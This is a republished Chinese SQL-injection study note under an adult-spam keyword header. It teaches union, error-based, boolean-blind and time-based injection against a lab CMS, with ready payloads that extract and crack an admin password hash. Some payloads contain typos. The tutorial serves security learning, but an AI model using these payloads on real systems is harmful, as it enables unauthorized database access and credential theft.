日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > 数据库 >内容正文

数据库

【CyberSecurityLearning 55】SQL注入

發(fā)布時(shí)間:2025/3/15 数据库 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【CyberSecurityLearning 55】SQL注入 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

目錄

SQL

簡(jiǎn)介

SQL注入基礎(chǔ)

漏洞原理

漏洞危害

分類

MYSQL相關(guān)

@注釋

@mysql 元數(shù)據(jù)數(shù)據(jù)庫(kù)information_schema

@ mysql常用的函數(shù)與參數(shù)(★)

@邏輯運(yùn)算

注入流程

SQL 注入

SQL 注入點(diǎn)的判斷

SQL注入注入點(diǎn)判斷的舉例說(shuō)明

聯(lián)合查詢

* 必要條件

* 判斷字段個(gè)數(shù)

??判斷顯示位置

報(bào)錯(cuò)注入

* group by 重復(fù)鍵沖突

SQL--報(bào)錯(cuò)注入---group by觸發(fā)報(bào)錯(cuò)的原理

SQL語(yǔ)句解析過(guò)程(運(yùn)算順序)

* XPATH 報(bào)錯(cuò)

布爾盲注

獲取數(shù)據(jù)庫(kù)名

延時(shí)注入

sqlmap(自動(dòng)化注入神器)

測(cè)試

get注入

post注入

攜帶cookie 的認(rèn)證

SQL 注入文件讀寫

寬字節(jié)注入

Cookie 注入

base64 注入

HTTP 頭部注入


?

SQL

簡(jiǎn)介

SQL 結(jié)構(gòu)化查詢語(yǔ)言,是一種特殊的編程語(yǔ)言,用于數(shù)據(jù)庫(kù)中的標(biāo)準(zhǔn)數(shù)據(jù)查詢語(yǔ)言。美國(guó)國(guó)家標(biāo)準(zhǔn)學(xué)會(huì)對(duì)SQL進(jìn)行規(guī)范后,以此作為關(guān)系式數(shù)據(jù)庫(kù)管理系統(tǒng)的標(biāo)準(zhǔn)語(yǔ)言。
常見的關(guān)系型數(shù)據(jù)庫(kù)系統(tǒng):MYSQL ACCESS???? MSSQL orcale
有明顯的層次結(jié)構(gòu): 庫(kù)名? |? 表名? |? 字段名? |? 字段內(nèi)容
不過(guò)個(gè)中通信的數(shù)據(jù)庫(kù)系統(tǒng)在其實(shí)踐過(guò)程中獨(dú)對(duì)SQL規(guī)范做了某些編改和擴(kuò)充。所以實(shí)際上不同的數(shù)據(jù)庫(kù)系統(tǒng)之間的SQL不能完全通用。
SQL注入是一種常見的Web 安全漏洞,攻擊者利用這個(gè)漏洞,可以訪問(wèn)或修改數(shù)據(jù),或者利用潛在的數(shù)據(jù)庫(kù)漏洞進(jìn)行攻擊

SQL注入基礎(chǔ)

漏洞原理

針對(duì)SQL注入的攻擊行為可描述為通過(guò)用戶可控參數(shù)中注入SQL語(yǔ)法,破壞原有SQL結(jié)構(gòu),達(dá)到編寫程序意料之外結(jié)果的攻擊行為。

其成因可歸結(jié)為以下兩個(gè)原理疊加造成:
1、程序編寫者在處理程序和數(shù)據(jù)庫(kù)交互時(shí),使用字符串拼接的方式構(gòu)造SQL語(yǔ)句。
2、未對(duì)用戶可控參數(shù)進(jìn)行足夠的過(guò)濾便將參數(shù)內(nèi)容拼接進(jìn)入到SQL語(yǔ)句中。

*注入點(diǎn)可能的位置

根據(jù)SQL 注入漏洞的原理,在用戶“可控參數(shù)”中注入SQL 語(yǔ)法,也就是說(shuō)Web 應(yīng)用在獲取用戶數(shù)據(jù)的地方,只要代入數(shù)據(jù)庫(kù)查詢,都有存在SQL 注入的可能,這些地方通常包括:
@?? GET 數(shù)據(jù)
@?? POST 數(shù)據(jù)
@?? HTTP 頭部(HTTP 請(qǐng)求報(bào)文其他字段)
@?? Cookie 數(shù)據(jù)
??? …
?GET+POST+COOKIE也叫GPC

漏洞危害

攻擊者利用SQL注入漏洞們可以獲取數(shù)據(jù)庫(kù)中的多中信息(如:管理員后臺(tái)密碼),從而脫取數(shù)據(jù)庫(kù)中內(nèi)容(脫庫(kù))。
在特別情況下還可以修改數(shù)據(jù)庫(kù)內(nèi)容或者插入內(nèi)容到數(shù)據(jù)庫(kù),如果數(shù)據(jù)庫(kù)權(quán)限分配存在問(wèn)題,或者數(shù)據(jù)庫(kù)本身存在缺陷,那么攻擊者就可以通過(guò)SQL注入漏洞直接獲取webshell 或者服務(wù)器系統(tǒng)權(quán)限。
mof提權(quán) | udf提權(quán)

分類

SQL注入漏洞根據(jù)不同的標(biāo)準(zhǔn),有不同的分類。但是從數(shù)據(jù)類型分類來(lái)看,SQL注入分為數(shù)字型和字符型。

·數(shù)字型注入就是說(shuō)注入點(diǎn)的數(shù)據(jù),拼接到SQL語(yǔ)句中是以數(shù)字型出現(xiàn)的,即數(shù)據(jù)兩邊沒(méi)有被單引號(hào)、雙引號(hào)包括。

·字符型注入正好相反

根據(jù)注入手法分類,大致分為以下幾個(gè)類別

??? @?? UNION query SQL injection(可聯(lián)合查詢注入)?? ??? ??? 聯(lián)合查詢
??? @?? Error-based SQL injection(報(bào)錯(cuò)型注入)?? ??? ??? ????????? 報(bào)錯(cuò)注入
??? @?? Boolean-based blind SQL injection(布爾型注入)?? ??? 布爾盲注
??? @?? Time-based blind SQL injection(基于時(shí)間延遲注入)? 延時(shí)注入
??? @?? Stacked queries SQL injection(可多語(yǔ)句查詢注入)?? 堆疊查詢

MYSQL相關(guān)

本科主要使用*map 環(huán)境,既然要探討SQL 注入漏洞,需要對(duì)數(shù)據(jù)庫(kù)有所了解,此處以mysql 為例,這里只起到拋磚引玉的作用,其他環(huán)境的注入,讀者可以根據(jù)本次的思路去學(xué)習(xí),唯一不同的只是數(shù)據(jù)庫(kù)的特性

@注釋

mysql 數(shù)據(jù)庫(kù)的注釋的大概有以下幾種

#

-- (杠杠空格)

/* … */

/*! … */ 內(nèi)聯(lián)查詢

@mysql 元數(shù)據(jù)數(shù)據(jù)庫(kù)information_schema

庫(kù)名表名字段名都叫做MySQL的元數(shù)據(jù),這些元數(shù)據(jù)代表了MySQL數(shù)據(jù)庫(kù)的結(jié)構(gòu)
庫(kù)名表名字段名MySQL會(huì)把它存到一個(gè)數(shù)據(jù)庫(kù)里面,叫information_schema

information_schema數(shù)據(jù)庫(kù)中的幾個(gè)關(guān)鍵的表

@ mysql常用的函數(shù)與參數(shù)(★)

show databases; #查看數(shù)據(jù)庫(kù)

use information_schema; #轉(zhuǎn)到數(shù)據(jù)庫(kù)information_schema

show tables; #查看當(dāng)前數(shù)據(jù)庫(kù)中的數(shù)據(jù)表

=??? >??? >=??? <=??? <>不等于

比較運(yùn)算符

select 1<>2;

and? |? or

邏輯運(yùn)算符

select 1 and 0;

version()

mysql 數(shù)據(jù)庫(kù)版本

select version();

database()

當(dāng)前數(shù)據(jù)庫(kù)名

select database();

user()

用戶名

select user();

current_user()

當(dāng)前用戶名

select current_user();

system_user()

系統(tǒng)用戶名

select system_user();

@@datadir

數(shù)據(jù)庫(kù)路徑

select @@datadir;

@@version_compile_os

操作系統(tǒng)版本

select @@version_compile_os;

length()

返回字符串長(zhǎng)度

select length('ffdfs');

select length(version());

substring()

?

功能:截取字符串
這三個(gè)函數(shù)都有三個(gè)參數(shù):

參數(shù)1、截取的字符串

參數(shù)2、截取的起始位置,從1開始(不是偏移量)

參數(shù)3、截取長(zhǎng)度

select substring("dhffjf",2,2);

substr()

select substr("version()",2);

select substr(version(),2,10);

mid()

select mid(' select ',2,6);

left()

從左側(cè)開始去指定字符個(gè)數(shù)的字符串(從左開始取多少個(gè)字符)

select left('adc',2);

select left(version(),2);

concat()

沒(méi)有分隔符的連接字符串

select concat('a','b','c');?? #abc

concat_ws()

含有分隔符的連接字符串

select concat_ws('/','a','b','c');? # a/b/c??

group_concat()

連接一個(gè)組的字符串

select group_concat(id) from users;?? #默認(rèn)以逗號(hào)分隔

ord()

返回ASCII碼

?

select ord('a');? # 97

ascii()

select ascii('a');

hex()

將字符串轉(zhuǎn)換為十六進(jìn)制

select hex('a');

unhex()

hex 的反向操作

select unhex(61);

md5()

返回MD5 值

select md5('123456');

floor(x)

返回不大于x 的最大整數(shù)

?

round()

返回參數(shù)x 接近的整數(shù)

?

rand()

返回0-1 之間的隨機(jī)浮點(diǎn)數(shù)

select rand();

load_file()

讀取文件,并返回文件內(nèi)容作為一個(gè)字符串(括號(hào)里面跟一個(gè)文件的絕對(duì)路徑)

?

sleep()

睡眠時(shí)間為指定的秒數(shù)

select sleep(5);

if(true,t,f)

if判斷(如果第一個(gè)參數(shù)是true返回第二個(gè),否則返回第三個(gè))

select if(true,1,0);? #1

select if(false,1,0);? #0

find_in_set()

返回字符串在字符串列表中的位置

?

benchmark()

指定語(yǔ)句執(zhí)行的次數(shù)

?

name_const()

返回表作為結(jié)果

?

chr() chr()函數(shù)的作用是將ascii碼轉(zhuǎn)換行字符 ?

@邏輯運(yùn)算

在SQL 語(yǔ)句中邏輯運(yùn)算與(and)比或(or)的優(yōu)先級(jí)要高。(not>and>or)

[ select 1=2 and 1=2 or 1=1--+ ]? # true

注入流程

由于關(guān)系型數(shù)據(jù)庫(kù)系統(tǒng),具有明顯的庫(kù)/表/列/內(nèi)容結(jié)構(gòu)層次,所以我們通過(guò)SQL 注入漏洞獲取數(shù)據(jù)庫(kù)中信息時(shí)候,也依據(jù)這樣的順序。

首先獲取數(shù)據(jù)庫(kù)名,其次獲取表名,然后獲取列名,最后獲取數(shù)據(jù)。

SQL 注入

使用工具:御劍掃描網(wǎng)站后臺(tái)

火狐瀏覽器插件:Wappalyzer

御劍有自己的字典

如果一個(gè)網(wǎng)站存在SQL注入漏洞,我們就可以去訪問(wèn)數(shù)據(jù)庫(kù),后臺(tái)管理員的用戶名密碼也在數(shù)據(jù)庫(kù),登錄網(wǎng)站后臺(tái)

SQL 注入點(diǎn)的判斷

@?? ?id=34??? +/- 1?? 變化id值,看有沒(méi)有變化

select * from tbName where id = $id

?

@?? ?id=35'??? 通過(guò)加單引號(hào),判斷是字符型還是數(shù)字型

報(bào)錯(cuò):near ''' at line 1

select * from tbName where id = 35'(說(shuō)明這個(gè)單引號(hào)有問(wèn)題,是多余的)

@?? 測(cè)試頁(yè)面是否有布爾類型的狀態(tài)

?id=35 and 1=1

?id=35 and 1=2

select * from tbName where id=35 and 1=1

select * from tbName where id=35 and 1=2

當(dāng)我們添加and1=1的時(shí)候或者and1=2的時(shí)候這兩次頁(yè)面的狀態(tài)十分相同,如果不同我們就認(rèn)為它有布爾類型的狀態(tài),如果相同就認(rèn)為布爾類型狀態(tài)不存在!

(頁(yè)面是否正常跟數(shù)據(jù)庫(kù)是否報(bào)錯(cuò)是兩個(gè)問(wèn)題)

@?? ?id=35 and sleep(5)????? 測(cè)試是否有延時(shí)

沉睡五秒怎么看?打開F12--網(wǎng)絡(luò)---看時(shí)間線

再沉睡4s看看,不一樣。說(shuō)明sleep會(huì)對(duì)頁(yè)面服務(wù)器的響應(yīng)照成影響

口訣:(前提是有SQL注入)
如果我們頁(yè)面中id加一或減一頁(yè)面發(fā)生變化考慮聯(lián)合查詢
如果頁(yè)面沒(méi)有變化,看有沒(méi)有報(bào)錯(cuò),如果有報(bào)錯(cuò)考慮報(bào)錯(cuò)注入
如果沒(méi)有報(bào)錯(cuò)也沒(méi)有回顯,考慮有沒(méi)有布爾類型的狀態(tài),如果有布爾類型狀態(tài)我們考慮布爾盲注
如果以上都沒(méi)有,我們用絕招(絕境中用的招),用延時(shí)注入

SQL注入注入點(diǎn)判斷的舉例說(shuō)明

* 說(shuō)明
??? 為了演示SQL 注入的四大基本手法,我們以CMS 為例。【已經(jīng)在win7中布置好了環(huán)境】
??? [http://172.16.132.138/cms/]

* 目標(biāo)
??? 通過(guò)SQL 注入漏洞獲得后臺(tái)管理員帳密并成功登錄系統(tǒng)。
??? 后臺(tái)地址[http://172.16.132.138/cms/admin/]
?? ?
* 四大基本手法
??? 四大基本手法包括:
??? @??? 聯(lián)合查詢
??? @??? 報(bào)錯(cuò)注入
??? @??? 布爾盲注
??? @??? 延時(shí)注入
* 注入點(diǎn)?
??? [http://172.16.132.138/cms/show.php?id=33]

* 注入點(diǎn)的判斷
??? 對(duì)連接[http://172.16.132.138/cms/show.php?id=33]是否是注入點(diǎn)進(jìn)行判斷。
??? @??? 變換id 參數(shù)
??? 當(dāng)我們變換id 參數(shù)(33+1|33-1)的時(shí)候,發(fā)現(xiàn)同一個(gè)頁(yè)面,show.php 頁(yè)面展現(xiàn)出不同的新聞內(nèi)容。也就是說(shuō),數(shù)據(jù)庫(kù)中的內(nèi)容會(huì)回顯到網(wǎng)頁(yè)中來(lái)。
??? 初步判定,id 參數(shù)會(huì)帶入數(shù)據(jù)庫(kù)查詢,根據(jù)不同的id 查詢數(shù)據(jù)庫(kù),得到不同的新聞內(nèi)容。
??? 猜測(cè)后臺(tái)執(zhí)行的SQL 語(yǔ)句大致結(jié)構(gòu)為:
??? select * from tbName where id=33;

?? ?
??? @??? 單引號(hào)
??? [?id=33']

??? 執(zhí)行的SQL 主語(yǔ)則變?yōu)?br /> ??? select * from tbName where id=33’;
??? 頁(yè)面報(bào)錯(cuò),并且報(bào)錯(cuò)信息會(huì)回顯在網(wǎng)頁(yè)中,報(bào)錯(cuò)信息如下
----
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
----
??? 錯(cuò)誤信息提示單引號(hào)位置出現(xiàn)錯(cuò)誤,那么說(shuō)明,SQL 語(yǔ)句從頭到參數(shù)33 都是正確的。也就是說(shuō),我們添加的單引號(hào)是多余的。
??? 因此,可以斷定參數(shù)33 前面沒(méi)有引號(hào)。
??? 則,此注入點(diǎn)(可能)為數(shù)字型注入。
??? @??? [and 1=1 ]
??? [?id=33 and 1=1 --+]
??? 可能得SQL 語(yǔ)句為
??? select * from tbName where id=33 and 1=1 --+

??? 頁(yè)面正常。
??? @??? [and 1=2]
??? [?id=33 and 1=2 --+]
??? 可能得SQL 語(yǔ)句
??? select * from tbName where id=33 and 1=2 --+

??? 頁(yè)面沒(méi)有新聞內(nèi)容,并且數(shù)據(jù)庫(kù)沒(méi)有報(bào)錯(cuò)。由于1=2 是恒假式,也就是查詢條件[where id=33 and 1=2 --+]恒假,這樣的SQL 語(yǔ)句在數(shù)據(jù)庫(kù)中執(zhí)行后,沒(méi)有返回結(jié)果,沒(méi)有新聞內(nèi)容。
??? 反過(guò)來(lái)看,頁(yè)面沒(méi)有新聞內(nèi)容,也就是SQL 語(yǔ)句查詢條件為假。也就是說(shuō),我們寫的語(yǔ)句[and 1=2 --+],起到了將查詢條件置為假的作用。
??? 那么,可以通過(guò)構(gòu)造語(yǔ)句來(lái)控制SQL 語(yǔ)句的查詢結(jié)果并且,SQL 語(yǔ)句查詢條件真假性,在頁(yè)面回顯中有體現(xiàn)。
??? @??? [and sleep(5)]
??? [?id=33 and sleep(5)]
??? 注入sleep(5) 語(yǔ)句,可以通過(guò)網(wǎng)絡(luò)時(shí)間線看到延時(shí)。

??? 說(shuō)明sleep(5) 語(yǔ)句起到了作用
??? 綜上,此連接存在SQL 注入漏洞。(除了變化id有回顯這種方法,剩下幾個(gè)出現(xiàn)其中任意一個(gè)我們就認(rèn)為它存在SQL注入漏洞)

聯(lián)合查詢

??? 由于數(shù)據(jù)庫(kù)中的內(nèi)容會(huì)回顯到頁(yè)面中來(lái),所以我們可以采用聯(lián)合查詢進(jìn)行注入。
??? 聯(lián)合查詢就是SQL 語(yǔ)法中的union select? 語(yǔ)句。該語(yǔ)句會(huì)同時(shí)執(zhí)行兩條select 語(yǔ)句,生成兩張?zhí)摂M表,然后把查詢到的結(jié)果進(jìn)行拼接。
?? ?select ~~~~ union select ~~~~
??? 由于虛擬表是二維結(jié)構(gòu),聯(lián)合查詢會(huì)"縱向"拼接,兩張?zhí)摂M的表。
?? ?
?? ?實(shí)現(xiàn) 跨庫(kù)跨表查詢

* 必要條件

??? @??? 兩張?zhí)摂M的表具有相同的列數(shù)
??? @??? 虛擬表對(duì)應(yīng)的列的數(shù)據(jù)類型相同

數(shù)字很特殊,它可以自動(dòng)轉(zhuǎn)化成字符串

原來(lái)它是數(shù)字,但是我們查詢的時(shí)候是字符,我要強(qiáng)制拼到一塊怎么辦?
我們可以把字符編碼,這樣我們就可以用數(shù)字表示字母

* 判斷字段個(gè)數(shù)

??? 可以使用[order by] 語(yǔ)句來(lái)判斷當(dāng)前select 語(yǔ)句所查詢的虛擬表的列數(shù)。
??? [order by]語(yǔ)句本意是按照某一列進(jìn)行排序,在mysql 中可以使用數(shù)字來(lái)代替具體的列名,比如[order by 1]就是按照第一列進(jìn)行排序,如果mysql 沒(méi)有找到對(duì)應(yīng)的列,就會(huì)報(bào)錯(cuò)[Unknown column]。我們可以依次增加數(shù)字,直到數(shù)據(jù)庫(kù)報(bào)錯(cuò)。
??? [order by 1 --+]??? # 按照第一個(gè)字段排序
??? [order by 2 --+]
??? ...
??? [order by 15 --+]

??? [order by 16]

??? 得到當(dāng)前虛擬表中字段個(gè)數(shù)為15

??
判斷顯示位置

??? 得到字段個(gè)數(shù)之后,可以嘗試構(gòu)造聯(lián)合查詢語(yǔ)句。
??? 這里我們并不知道表名,根據(jù)mysql 數(shù)據(jù)庫(kù)特性,select 語(yǔ)句在執(zhí)行的過(guò)程中,并不需要指定表名。
??? [?id=33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+]
?? ?[?id=33 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+]??

如果不能用order by判斷列數(shù),我們可以用一個(gè)null、兩個(gè)null...試出來(lái)

select 1,2,3(發(fā)現(xiàn)字段名和內(nèi)容都是1,2,3)


??? 頁(yè)面顯示的是第一張?zhí)摂M表的內(nèi)容,那么我們可以考慮讓第一張?zhí)摂M表的查詢條件為假,則顯示第二條記錄。因此構(gòu)造SQL 語(yǔ)句:
??? [?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --+]
或者
?? ?[?id=-33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --+]

??? 在執(zhí)行SQL 語(yǔ)句的時(shí)候,可以考慮用火狐瀏覽器的插件hackbar。

??? 發(fā)現(xiàn)3 和11 會(huì)回顯到頁(yè)面中來(lái)。

* 數(shù)據(jù)庫(kù)版本

??? 我們可以將數(shù)字3 用函數(shù)[version()]代替,即可得到數(shù)據(jù)庫(kù)的版本。將11換成database()可以得到數(shù)據(jù)庫(kù)名
??? [?id=33 and 1=2 union select 1,2,version(),4,5,6,7,8,9,10,database(),12,13,14,15 --+]

??? 數(shù)據(jù)庫(kù)版本為5.5.53。


* 當(dāng)前數(shù)據(jù)庫(kù)名

??? [database()]
??? [?id=33 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+]

* 數(shù)據(jù)庫(kù)中的表

??? [?id=33 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() --+? ]?
??? 我們?cè)陧?yè)面中盡量避免使用字符串,用函數(shù)來(lái)代替。

報(bào)錯(cuò):

考慮是不是編碼有問(wèn)題(union查詢的兩個(gè)條件)

??? 數(shù)據(jù)庫(kù)報(bào)錯(cuò),考慮用[hex()] 函數(shù)將結(jié)果由字符串轉(zhuǎn)化成數(shù)字。(可以用ASCII也可以用十六進(jìn)制)
??? [?id=33 and 1=2 union select 1,2,hex(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() --+]

??? 得到十六進(jìn)制編碼后的字符串
----
636D735F61727469636C652C636D735F63617465676F72792C636D735F66696C652C636D735F667269656E646C696E6B2C636D735F6D6573736167652C636D735F6E6F746963652C636D735F706167652C636D735F7573657273
----
??? 再進(jìn)行十六進(jìn)制解碼(用burpsuite)【Decoder----decode as ASCII hex】


----
cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users
----
??? 管理員帳密有可能保存在cms_users 表中。
* 查詢表中字段

?id=33 and 1=2 union select 1,2,hex(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'--+

cms_users作為字符串出現(xiàn)我們要加單引號(hào),但是我們要避免單引號(hào)的使用,把cms_users轉(zhuǎn)換為十六進(jìn)制(選擇后用hackbar---Encoding---Hex Encode--前面加0x表示十六進(jìn)制)

----
7573657269642C757365726E616D652C70617373776F7264
----

去解碼:
----
userid,username,password
----
* 字段內(nèi)容

??? 查詢表中記錄數(shù)
??? [?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,11,12,13,14,15 from cms_users --+]

??? cms_users 表中只有一條記錄。
?? ?
??? 查詢字段內(nèi)容
??? [?id=33 and 1=2 union select 1,2,hex(concat(username,':',password)),4,5,6,7,8,9,10,11,12,13,14,15 from cms_users --+]

----
61646D696E3A6531306164633339343962613539616262653536653035376632306638383365
----
----
admin:e10adc3949ba59abbe56e057f20f883e
----
??? 得到的是后臺(tái)管理員帳密,但是密碼是以密文的方式保存在數(shù)據(jù)庫(kù)中的。通過(guò)觀察密文可知,此密文為MD5 密文。可以在線查詢,網(wǎng)址為
??? [https://www.cmd5.com/],可以忽略加密類型。
----
admin:123456
----
??? 通過(guò)網(wǎng)站后臺(tái)登錄系統(tǒng)

報(bào)錯(cuò)注入

??? 在注入點(diǎn)的判斷過(guò)程中,發(fā)現(xiàn)數(shù)據(jù)庫(kù)中SQL 語(yǔ)句的報(bào)錯(cuò)信息,會(huì)顯示在頁(yè)面中,因此可以進(jìn)行報(bào)錯(cuò)注入。
??? 報(bào)錯(cuò)注入的原理,就是在錯(cuò)誤信息中執(zhí)行SQL 語(yǔ)句。觸發(fā)報(bào)錯(cuò)的方式很多,具體細(xì)節(jié)也不盡相同。此處建議直接背公式即可

select concat(left(rand(),3),'^',(select version()),'^') as x,count(*) from information_schema.tables group by x;
語(yǔ)句中的as是給concat(left(rand(),3),'^',(select version()),'^')起別名x,方便后面的聚合操作。此處as可以省略,直接寫x即可:
select concat(left(rand(),3),'^',(select version()),'^') x,count(*) from information_schema.tables group by x;

如果關(guān)鍵的表被禁用了,可以采用如下語(yǔ)句://自己構(gòu)造一個(gè)表

select? concat('^',version(),'^',floor(rand()*2))x,count(*) from (select 1 union select null union select !1) a group by x;

如果rand()函數(shù)或者count()函數(shù)被禁用了,可以用如下方式:

select min(@a:=1) from information_schema.tables group by concat('^',@@version,'^',@a:=(@a+1)%2);

不依賴額外的函數(shù)和具體的表

select min(@a:=1) from (select 1 union select null union select !1) a group by concat('^',@@version,'^',@a:=(@a+1)%2);

注意:此種方法有可能成功,也可能不成功

* group by 重復(fù)鍵沖突

??? [?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+]
??? [?id=33 and (select 1 from (select count(*),concat((select database() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+]

group by的報(bào)錯(cuò)實(shí)際上是MySQL一個(gè)天生的缺陷
我們現(xiàn)行的版本,只要是MySQL,只要是有報(bào)錯(cuò)信息,用這種方法注入是最穩(wěn)妥的方式,因?yàn)樗荕ySQL天生的

SQL--報(bào)錯(cuò)注入---group by觸發(fā)報(bào)錯(cuò)的原理

@創(chuàng)建數(shù)據(jù)庫(kù),并寫入數(shù)據(jù);

mysql> create database groupbyTest;
Query OK, 1 row affected (0.00 sec)

mysql> use groupbyTest;
Database changed
mysql> show tables;
Empty set (0.01 sec)

mysql> create table r1 (a int);
Query OK, 0 rows affected (0.02 sec)

mysql> insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);
Query OK, 14 rows affected (0.01 sec)
Records: 14? Duplicates: 0? Warnings: 0

@簡(jiǎn)單的查詢

mysql> select * from r1;
+------+
| a??? |
+------+
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
|??? 1 |
|??? 2 |
+------+
14 rows in set (0.00 sec)

mysql> select count(*) from r1;?? //查詢r(jià)1表有多少條記錄
+----------+
| count(*) |
+----------+
|?????? 14?? |
+----------+
1 row in set (0.00 sec)

mysql> select count(*) from r1 group by a;
+----------+
| count(*) |
+----------+
|??????? 7 |
|??????? 7 |
+----------+
2 rows in set (0.00 sec)

mysql> select count(*) from r1 group by "1";
+----------+
| count(*) |
+----------+
|?????? 14 ? |
+----------+
1 row in set (0.00 sec)

rand()是0-1中的隨機(jī)數(shù),一般都是小數(shù)

mysql> select left(rand(),3),a from r1 group by 1;? // group by 1表示按照第一個(gè)字段進(jìn)行分類聚合
+----------------+------+
| left(rand(),3) | a??? |
+----------------+------+
| 0.0?????????? ? ? |??? 2 |
| 0.1?????????????? |??? 1 |
| 0.2?????????????? | ?? 1 |
| 0.3?????????????? |??? 2 |
| 0.5?????????????? |??? 1 |
| 0.6?????????????? |??? 2 |
| 0.7?????????????? |??? 1 |
| 0.8?????????????? |??? 1 |
+----------------+------+
8 rows in set (0.00 sec)

由于rand函數(shù)每次執(zhí)行的結(jié)果都是不一樣的

select left(rand(),3),a,count(*) from r1 group by 1
此處引入count()函數(shù),產(chǎn)生group by重復(fù)鍵沖突報(bào)錯(cuò)

//每次執(zhí)行都報(bào)錯(cuò),而且報(bào)的還不一樣

mysql> select left(rand(),3),a,count(*) from r1 group by 1;
ERROR 1062 (23000): Duplicate entry '0.2' for key 'group_key'
mysql> select left(rand(),3),a,count(*) from r1 group by 1;
ERROR 1062 (23000): Duplicate entry '0.0' for key 'group_key'
mysql> select left(rand(),3),a,count(*) from r1 group by 1;
ERROR 1062 (23000): Duplicate entry '0.6' for key 'group_key'
mysql>

分析:先執(zhí)行from 再執(zhí)行g(shù)roup by(group by1 的時(shí)候rand()函數(shù)也會(huì)執(zhí)行),然后要執(zhí)行select語(yǔ)句,left(rand(),3)這個(gè)子句會(huì)運(yùn)行
這時(shí)候就會(huì)產(chǎn)生一個(gè)矛盾。group by是隨機(jī)的,很大概率,我們group by在執(zhí)行運(yùn)算rand()的時(shí)候跟我們select在執(zhí)行運(yùn)算rand的時(shí)候,兩次rand的值不一樣(大概率),所以會(huì)參生重復(fù)鍵沖突問(wèn)題

@其他語(yǔ)句

select? round(rand(),1),a,count(*) from r1 group by 1;?? //round(x)? 返回參數(shù)x最接近的整數(shù)

mysql> select? round(rand(),1),a,count(*) from r1 group by 1;? //也會(huì)有重復(fù)鍵的錯(cuò)誤,group by 1就是按照round(rand(),1)字段分類
ERROR 1062 (23000): Duplicate entry '0.5' for key 'group_key'

mysql> select a,count(*) from r1 group by round(rand(),1);
ERROR 1062 (23000): Duplicate entry '0.5' for key 'group_key'

mysql> select floor(rand()*2),a,count(*) from r1 group by 1;? //floor(x)返回不大于x的最大整數(shù)(向下取整)//是有成功率的
+-------------------+-----+-----------+
| floor(rand()*2) |? a?? | count(*) |
+-----------------+------+----------+
|?????????????? 0 ? ? |??? 1 ? |??????? 7 ? |
|?????????????? 1???? |??? 1 ? |??????? 7?? |
+-----------------+------+----------+
2 rows in set (0.00 sec)

mysql> select floor(rand()*2),a,count(*) from r1 group by 1;?? //第二次執(zhí)行就報(bào)重復(fù)鍵錯(cuò)誤
ERROR 1062 (23000): Duplicate entry '1' for key 'group_key'

SQL語(yǔ)句解析過(guò)程(運(yùn)算順序)

# FROM

from 后面的表標(biāo)識(shí)了這條語(yǔ)句要查詢的數(shù)據(jù)源。
from過(guò)程之后會(huì)形成一個(gè)虛擬表VT1。

# WHERE

where對(duì)VT1過(guò)程中生成的臨時(shí)表進(jìn)行過(guò)濾,滿足where子句的列被插到VT2中。

# GROUP BY

group by會(huì)把VT2生成的表按照group by中的列進(jìn)行分組,生成VT3。

# HAVING

having? 這個(gè)子句對(duì)VT3表中的不同分組進(jìn)行過(guò)濾,滿足having條件的子句被加到VT4表中。

# SELECT

select這個(gè)子句對(duì)select子句中的元素進(jìn)行處理,生成VT5表。
—? 計(jì)算表達(dá)式,計(jì)算select子句的表達(dá)式,生成VT5-1
—? DISTINCT尋找VT5-1表中重復(fù)的列,并刪掉,生成VT5-2
—? TOP從order by子句定義的結(jié)果中,篩選出符合條件的列,生成VT5-3

# GROUP BY從VT5-3中的表,根據(jù)order by子句的結(jié)果進(jìn)行排序,生成VT6

* XPATH 報(bào)錯(cuò)

??? @??? extractalue()
??? [?id=33 and extractvalue(1,concat('^',(select version()),'^')) --+]

??? @??? updatexml()
??? [?id=33 and updatexml(1,concat('^',(select database()),'^'),1) --+]

低版本是不支持XPATH報(bào)錯(cuò)的(MySQL5.0以下的版本,那就用group by)

?

?

布爾盲注

* 原理

利用頁(yè)面返回的布爾類型狀態(tài),正常或者不正常

獲取數(shù)據(jù)庫(kù)名

@ 數(shù)據(jù)庫(kù)名長(zhǎng)度

[… and length(database())=1--+]

?

[… and length(database())=3--+](夾逼準(zhǔn)則/二分法)

@ 數(shù)據(jù)庫(kù)名

[… and ascii(substr(database(),1,1))=99--+]

由此可知數(shù)據(jù)庫(kù)名的第一個(gè)字母的ASCII 碼是99,即字母C

?

延時(shí)注入

利用sleep() 語(yǔ)句的延時(shí)性,以時(shí)間線作為判斷條件

獲取數(shù)據(jù)庫(kù)名

@ 獲取數(shù)據(jù)庫(kù)名長(zhǎng)度

[.. and if((length(database())=3),sleep(5),1)--+]

@ 數(shù)據(jù)庫(kù)名第二位

[.. and if((ascii(substr(database(),2,1,)=109),sleep(5),1)]

口訣(前提是SQL漏洞存在)

判斷是否有回顯?????????? 聯(lián)合查詢

